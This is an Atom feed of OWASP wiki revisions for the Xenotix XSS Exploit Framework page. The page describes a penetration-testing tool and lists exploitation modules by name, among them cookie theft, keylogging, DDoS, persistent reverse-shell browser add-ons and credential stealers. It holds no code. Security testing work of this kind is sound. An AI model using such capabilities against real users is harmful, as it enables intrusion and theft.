<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ajin+Abraham</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ajin+Abraham"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Ajin_Abraham"/>
		<updated>2026-04-29T23:49:10Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=232480</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=232480"/>
				<updated>2017-08-21T13:32:11Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: removed all download links from owasp page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Low False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]  &lt;br /&gt;
: [[Media: Xenotixxssexploitframeworkbyajinabraham-130820064955-phpapp02.pdf | Download PDF ]]&lt;br /&gt;
&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
** HSTS+ CSP Visited Sites Grabber&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
== Downloads ==&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Get Xenotix Binaries: https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.2 Changes==&lt;br /&gt;
* Added more Payloads&lt;br /&gt;
* New Info Gathering Module HSTS+CSP Visited Sites Detection&lt;br /&gt;
* Bug Fix Hash Calculator&lt;br /&gt;
* Bug Fix - Get Fuzzer&lt;br /&gt;
* Bug Fix IP2Geolocation&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS on Google Docs]&lt;br /&gt;
&lt;br /&gt;
[[Media:Xenotix_XSS_Protection_CheatSheet_For_Developers.pdf| Download PDF from owasp.org]]&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=211445</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=211445"/>
				<updated>2016-03-19T07:23:26Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
** HSTS+ CSP Visited Sites Grabber&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
